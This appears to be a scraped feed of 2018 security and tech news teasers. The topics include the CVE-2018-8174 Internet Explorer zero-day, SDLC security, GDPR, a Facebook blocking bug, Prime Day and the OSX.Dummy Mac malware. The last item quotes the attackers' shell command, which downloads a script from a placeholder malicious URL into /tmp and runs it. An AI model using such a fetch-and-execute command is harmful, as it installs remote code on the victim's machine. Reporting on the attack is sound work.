Delving deep into VBScript

In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object.

If You Say Something Is “Likely,” How Likely Do People Think It Is?

People use imprecise words to describe the chance of events all the time — “It’s likely to rain,” or “There’s a real possibility they’ll launch before us,” or “It’s doubtful the nurses will strike.” Not only are such probabilistic terms subjective, but they also can have widely different interpretations. One person’s “pretty likely” is another’s “far from certain.” Our research shows just how broad these gaps in understanding can be and the types of problems that can flow from these differences in interpretation.

What Security Lessons Can Large Enterprises Learn From Small Businesses?

Have you ever been in a situation where multiple adults are attempting to solve a problem, but a small child is the only voice of reason in the room? Children often lack a filter — and have a unique type of wisdom that can only stem from a young person’s perspective of the world. Why can’t we harness these powers for the business world?

Facebook Bug Unblocked Your Blocked Friends for a Week

Facebook has notified 800,000 users whose privacy has been compromised by a “blocked” bug. It appears that blocked individuals on Facebook and Messenger of the affected users were temporarily unblocked. Facebook also has some new API restrictions aimed at protecting user information more efficiently.

How To Secure Your SDLC The Right Way

The ever evolving threat landscape in our ecosystem demands that we put some thought into the security controls that we use to ensure we keep the bad guys away from our data. This is where software development lifecycle (SDLC) security comes into play. Organizations need to ensure that beyond providing their customers with innovative products ahead of the competition, their security is on point every step of the way throughout the SDLC.  

Science Fiction Come True: Weaponized Technology Threatens to Shatter Security, Critical Systems

By 2020, the very foundations of today’s digital world will shake. Nation states and terrorist groups will increasingly weaponize the cyber domain, launching attacks on critical national infrastructure that cause widespread destruction and chaos. With power, communications and logistics systems down, organizations will lose the basic building blocks needed for doing business. Heating, air conditioning, lighting, transport, information, communication and a safe working environment will no longer be taken for granted.

Navigating Dangerous Waters: the Maritime Industry’s New Cybersecurity Threat as Technology Innovation Grows

The rapid evolution of technology and, in particular, the Industrial Internet of Things (IIoT) is transforming critical environments, bringing benefits such as optimised processes, reduced costs and energy efficiencies. The maritime industry, which forms part of our critical infrastructure, is adapting to access many of the benefits that innovation in technology can offer. By the end of the decade, for example, a new era of shipping will have started with the world’s first autonomous container ship transporting goods around the coastline of Norway.

A bigger Amazon Prime Day 2018 arrives July 16 with more deals, devices and longer hours

Amazon’s Prime Day, the company’s annual sales event that’s now its biggest, will be held this year on July 16, starting at 12 PM PT/3 PM ET, the retailer announced today. One big change this time around is the event’s length — last year, Prime Day ran 30 hours, but this year’s event will run for 36 hours. In addition to being the longest Prime Day to date, the event will also expand to new markets this year, says Amazon.

GDPR Was Painful, But What Happens Now?

With the GDPR deadline now passed, the sigh of relief from IT departments up and down the country was almost audible. IT teams were thrown the challenge of working out what was needed to meet the GDPR guidelines as it was thought to be a security issue. It swiftly became apparent, however, that it was a people and process issue and not a technology one. So IT passed the buck on to the legal, HR and finance departments. But as companies gained a handle on the policies and procedures they needed it quickly became apparent the IT department would be required again.

Raytheon hires Air Force CISO Peter Kim

The U.S. Air Force’s recently departed Chief Information Security Officer Peter Kim joined the military contracting giant Raytheon as its director of IT security and governance at the company’s subsidiary Raytheon Missile Systems, CyberScoop has learned.

Mac malware targets cryptomining users

Last week, a security researcher named Remco Verhoef announced the discovery of a new piece of Mac malware being distributed on cryptomining chat groups. This malware was later further analyzed by Patrick Wardle, who gave it the rather appropriate moniker OSX.Dummy.

The malware was being distributed by chat users posing as admins, who posted the following shell script for users to run:

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script